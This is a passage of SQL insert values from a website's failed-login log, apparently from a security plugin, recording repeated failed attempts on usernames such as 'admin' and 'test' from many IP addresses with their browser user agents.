(103096, 1499343981.452759, 1, 'loginFailInvalidUsername', 'test', 0, 1744766570, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103097, 1499343983.401918, 1, 'loginFailInvalidUsername', 'test', 0, 1744766570, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103098, 1499346339.861776, 1, 'loginFailInvalidUsername', 'test', 0, 1768331578, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103099, 1499346340.879832, 1, 'loginFailInvalidUsername', 'test', 0, 1768331578, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103100, 1499347184.730024, 1, 'loginFailInvalidUsername', 'test', 0, 3392757914, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103101, 1499347186.275606, 1, 'loginFailInvalidUsername', 'test', 0, 3392757914, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103102, 1499349691.613903, 1, 'loginFailInvalidUsername', 'test', 0, 1856948984, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103103, 1499349693.333458, 1, 'loginFailInvalidUsername', 'test', 0, 1856948984, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103104, 1499349840.226149, 1, 'loginFailInvalidUsername', 'test', 0, 1571327709, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103105, 1499349841.643147, 1, 'loginFailInvalidUsername', 'test', 0, 1571327709, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103106, 1499350051.463550, 1, 'loginFailValidUsername', 'julie', 2, 3470133369, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(103107, 1499352974.912634, 1, 'loginFailInvalidUsername', 'test', 0, 2057571671, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103108, 1499352977.066294, 1, 'loginFailInvalidUsername', 'test', 0, 2057571671, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103109, 1499353043.406428, 1, 'loginFailInvalidUsername', 'test', 0, 1174403878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103110, 1499353044.917583, 1, 'loginFailInvalidUsername', 'test', 0, 1174403878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103111, 1499354867.701495, 1, 'loginFailInvalidUsername', 'test', 0, 1832068382, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103112, 1499354869.129096, 1, 'loginFailInvalidUsername', 'test', 0, 1832068382, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103113, 1499358619.775153, 1, 'loginFailInvalidUsername', 'test', 0, 3467968148, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103114, 1499358620.872011, 1, 'loginFailInvalidUsername', 'test', 0, 3467968148, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103115, 1499358987.183462, 1, 'loginFailInvalidUsername', 'test', 0, 1602728795, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103116, 1499358988.298176, 1, 'loginFailInvalidUsername', 'test', 0, 1602728795, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103117, 1499359379.757908, 1, 'loginFailInvalidUsername', 'test', 0, 1892391550, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103118, 1499359384.518750, 1, 'loginFailInvalidUsername', 'test', 0, 1892391550, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103119, 1499362597.438259, 1, 'loginFailInvalidUsername', 'test', 0, 2058401108, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103120, 1499367516.289467, 1, 'loginFailInvalidUsername', 'test', 0, 531691445, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101787, 1498073278.677671, 1, 'loginFailValidUsername', 'admin', 1, 3181235630, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101786, 1498072934.329857, 1, 'loginFailValidUsername', 'admin', 1, 2945352912, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101785, 1498071605.811675, 1, 'loginFailValidUsername', 'admin', 1, 411506089, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101784, 1498071604.402361, 1, 'loginFailValidUsername', 'admin', 1, 411506089, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101783, 1498069222.467939, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101782, 1498068631.927366, 1, 'loginFailValidUsername', 'admin', 1, 1569349340, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101781, 1498068630.930973, 1, 'loginFailValidUsername', 'admin', 1, 1569349340, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101780, 1498068241.212774, 1, 'loginFailValidUsername', 'admin', 1, 1743128234, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101779, 1498068239.869482, 1, 'loginFailValidUsername', 'admin', 1, 1743128234, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101778, 1498068082.601883, 1, 'loginFailValidUsername', 'admin', 1, 3271794354, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101777, 1498068081.326275, 1, 'loginFailValidUsername', 'admin', 1, 3271794354, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101776, 1498063803.063333, 1, 'loginFailValidUsername', 'admin', 1, 3104057687, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101775, 1498063801.882317, 1, 'loginFailValidUsername', 'admin', 1, 3104057687, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101774, 1498062428.456004, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101773, 1498060337.713513, 1, 'loginFailValidUsername', 'admin', 1, 3003616505, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101772, 1498060336.316402, 1, 'loginFailValidUsername', 'admin', 1, 3003616505, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101771, 1498057918.073442, 1, 'loginFailValidUsername', 'admin', 1, 3000937203, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101770, 1498057917.004727, 1, 'loginFailValidUsername', 'admin', 1, 3000937203, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101769, 1498056988.970033, 1, 'loginFailValidUsername', 'admin', 1, 2988447399, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101768, 1498056988.085147, 1, 'loginFailValidUsername', 'admin', 1, 2988447399, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101767, 1498055661.688157, 1, 'loginFailValidUsername', 'admin', 1, 1375311440, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101766, 1498055660.648370, 1, 'loginFailValidUsername', 'admin', 1, 1375311440, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101765, 1498054319.087232, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101764, 1498053409.041622, 1, 'loginFailValidUsername', 'admin', 1, 2979846103, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101763, 1498053407.525129, 1, 'loginFailValidUsername', 'admin', 1, 2979846103, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101762, 1498052530.407631, 1, 'loginFailValidUsername', 'julie', 2, 1546258433, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(101761, 1498049296.946549, 1, 'loginFailValidUsername', 'admin', 1, 2959089953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101760, 1498049295.710437, 1, 'loginFailValidUsername', 'admin', 1, 2959089953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101759, 1498046519.162745, 1, 'loginFailValidUsername', 'admin', 1, 1856586988, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101758, 1498046517.609319, 1, 'loginFailValidUsername', 'admin', 1, 1856586988, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101757, 1498046287.194604, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101756, 1498043376.048914, 1, 'loginFailValidUsername', 'admin', 1, 1459852167, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101755, 1498043370.907320, 1, 'loginFailValidUsername', 'admin', 1, 1459852167, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101754, 1498043098.094924, 1, 'loginFailValidUsername', 'admin', 1, 1279580798, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101753, 1498043096.854560, 1, 'loginFailValidUsername', 'admin', 1, 1279580798, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101752, 1498040986.466949, 1, 'loginFailValidUsername', 'admin', 1, 1506386598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101751, 1498040985.478783, 1, 'loginFailValidUsername', 'admin', 1, 1506386598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101750, 1498040629.976274, 1, 'loginFailValidUsername', 'admin', 1, 1337055094, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101749, 1498040515.962553, 1, 'loginFailValidUsername', 'admin', 1, 1021415560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101748, 1498040472.061713, 1, 'loginFailValidUsername', 'admin', 1, 1359429954, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101747, 1498040470.990846, 1, 'loginFailValidUsername', 'admin', 1, 1359429954, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101746, 1498038500.281597, 1, 'loginFailValidUsername', 'admin', 1, 695411646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101745, 1498038498.612477, 1, 'loginFailValidUsername', 'admin', 1, 695411646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101744, 1498037969.098850, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101743, 1498037816.444488, 1, 'loginFailValidUsername', 'admin', 1, 1556308942, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101742, 1498035796.314539, 1, 'loginFailValidUsername', 'admin', 1, 1118428951, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101741, 1498035795.126252, 1, 'loginFailValidUsername', 'admin', 1, 1118428951, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101740, 1498035690.100213, 1, 'loginFailValidUsername', 'admin', 1, 1328147598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101739, 1498035683.537826, 1, 'loginFailValidUsername', 'admin', 1, 1328147598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101738, 1498034923.308564, 1, 'loginFailValidUsername', 'admin', 1, 1337221594, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101737, 1498032888.228330, 1, 'loginFailValidUsername', 'admin', 1, 1856920432, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101736, 1498032886.478639, 1, 'loginFailValidUsername', 'admin', 1, 1856920432, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101735, 1498031361.340099, 1, 'loginFailValidUsername', 'admin', 1, 1587342918, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101734, 1498030435.845342, 1, 'loginFailValidUsername', 'admin', 1, 1207855921, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101733, 1498030434.536906, 1, 'loginFailValidUsername', 'admin', 1, 1207855921, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101732, 1498030049.233906, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101731, 1498029532.413762, 1, 'loginFailValidUsername', 'admin', 1, 3000960804, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101730, 1498029531.362678, 1, 'loginFailValidUsername', 'admin', 1, 3000960804, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101729, 1498029511.314517, 1, 'loginFailValidUsername', 'admin', 1, 1187187367, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101728, 1498029509.906781, 1, 'loginFailValidUsername', 'admin', 1, 1187187367, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101727, 1498027680.124962, 1, 'loginFailValidUsername', 'admin', 1, 832017728, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101726, 1498027658.602266, 1, 'loginFailValidUsername', 'admin', 1, 3162614869, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(101725, 1498027626.462025, 1, 'loginFailValidUsername', 'admin', 1, 3155022212, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(101724, 1498026975.552474, 1, 'loginFailValidUsername', 'admin', 1, 3661641996, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(101723, 1498022558.519152, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101722, 1498019095.418519, 1, 'loginFailValidUsername', 'admin', 1, 2945386850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101721, 1498017274.542239, 1, 'loginFailValidUsername', 'admin', 1, 3535466845, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101720, 1498017272.871030, 1, 'loginFailValidUsername', 'admin', 1, 3535466845, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101719, 1498015746.755682, 1, 'loginFailValidUsername', 'admin', 1, 1053979479, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB5)'),
(101718, 1498015571.098386, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101717, 1498013595.981818, 1, 'loginFailValidUsername', 'admin', 1, 3368662074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101716, 1498013594.664284, 1, 'loginFailValidUsername', 'admin', 1, 3368662074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101715, 1498013039.502768, 1, 'loginFailValidUsername', 'admin', 1, 3374681884, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101714, 1498008647.151771, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101713, 1498007571.126202, 1, 'loginFailValidUsername', 'admin', 1, 2321456046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101712, 1498007569.315684, 1, 'loginFailValidUsername', 'admin', 1, 2321456046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101711, 1497999843.367453, 1, 'loginFailValidUsername', 'admin', 1, 49282867, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101710, 1497999842.087503, 1, 'loginFailValidUsername', 'admin', 1, 49282867, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101709, 1497999469.476597, 1, 'loginFailValidUsername', 'admin', 1, 1358088689, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101708, 1497998150.124967, 1, 'loginFailValidUsername', 'admin', 1, 93338852, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101707, 1497998149.060720, 1, 'loginFailValidUsername', 'admin', 1, 93338852, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101706, 1497996319.058161, 1, 'loginFailValidUsername', 'admin', 1, 2955644117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101705, 1497994691.694276, 1, 'loginFailValidUsername', 'admin', 1, 2977849083, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101704, 1497994690.060853, 1, 'loginFailValidUsername', 'admin', 1, 2977849083, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101703, 1497994400.003932, 1, 'loginFailValidUsername', 'admin', 1, 2974496574, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101702, 1497994397.246968, 1, 'loginFailValidUsername', 'admin', 1, 2974496574, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101701, 1497992475.301848, 1, 'loginFailValidUsername', 'admin', 1, 1600021915, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101700, 1497992474.317692, 1, 'loginFailValidUsername', 'admin', 1, 1600021915, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101699, 1497991546.449353, 1, 'loginFailValidUsername', 'admin', 1, 629625464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101698, 1497991545.267727, 1, 'loginFailValidUsername', 'admin', 1, 629625464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101697, 1497991484.049882, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101696, 1497989071.583200, 1, 'loginFailValidUsername', 'admin', 1, 1435149827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101695, 1497989070.339537, 1, 'loginFailValidUsername', 'admin', 1, 1435149827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101694, 1497989037.937402, 1, 'loginFailValidUsername', 'admin', 1, 39255185, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101693, 1497989036.534000, 1, 'loginFailValidUsername', 'admin', 1, 39255185, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101692, 1497988057.074439, 1, 'loginFailValidUsername', 'admin', 1, 1728662503, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101691, 1497988055.685251, 1, 'loginFailValidUsername', 'admin', 1, 1728662503, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101690, 1497987933.355412, 1, 'loginFailValidUsername', 'admin', 1, 1547443325, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101689, 1497987932.256528, 1, 'loginFailValidUsername', 'admin', 1, 1547443325, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101688, 1497987472.077714, 1, 'loginFailValidUsername', 'admin', 1, 1743247718, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101687, 1497987470.665440, 1, 'loginFailValidUsername', 'admin', 1, 1743247718, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101686, 1497987406.122454, 1, 'loginFailValidUsername', 'admin', 1, 3192913058, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101685, 1497985824.148151, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101684, 1497985716.447654, 1, 'loginFailValidUsername', 'admin', 1, 3036536582, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101683, 1497985714.434126, 1, 'loginFailValidUsername', 'admin', 1, 3036536582, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101682, 1497983740.432259, 1, 'loginFailValidUsername', 'admin', 1, 694796831, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101681, 1497983737.922523, 1, 'loginFailValidUsername', 'admin', 1, 694796831, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101680, 1497979811.616526, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101679, 1497978663.777157, 1, 'loginFailValidUsername', 'admin', 1, 3244037298, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101678, 1497978661.612184, 1, 'loginFailValidUsername', 'admin', 1, 3244037298, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101677, 1497978053.777117, 1, 'loginFailValidUsername', 'admin', 1, 1389428352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101676, 1497978052.364604, 1, 'loginFailValidUsername', 'admin', 1, 1389428352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101675, 1497977712.517301, 1, 'loginFailValidUsername', 'admin', 1, 2107721451, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101674, 1497977709.991793, 1, 'loginFailValidUsername', 'admin', 1, 2107721451, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101673, 1497972675.801396, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101672, 1497971420.193250, 1, 'loginFailValidUsername', 'admin', 1, 704136757, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101671, 1497971418.900500, 1, 'loginFailValidUsername', 'admin', 1, 704136757, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101670, 1497970099.701574, 1, 'loginFailValidUsername', 'admin', 1, 1442063276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101669, 1497970098.273162, 1, 'loginFailValidUsername', 'admin', 1, 1442063276, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101668, 1497965934.414187, 1, 'loginFailValidUsername', 'admin', 1, 3316062394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101667, 1497965929.837402, 1, 'loginFailValidUsername', 'admin', 1, 3316062394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101666, 1497964457.913483, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101665, 1497956807.893619, 1, 'loginFailValidUsername', 'admin', 1, 3682725338, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(101664, 1497956552.989658, 1, 'loginFailValidUsername', 'admin', 1, 3000964923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101663, 1497956551.934442, 1, 'loginFailValidUsername', 'admin', 1, 3000964923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(101662, 1497955206.365487, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(101661, 1497955206.058822, 1, 'loginFailInvalidUsername', 'amministratore', 0, 1466596995, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
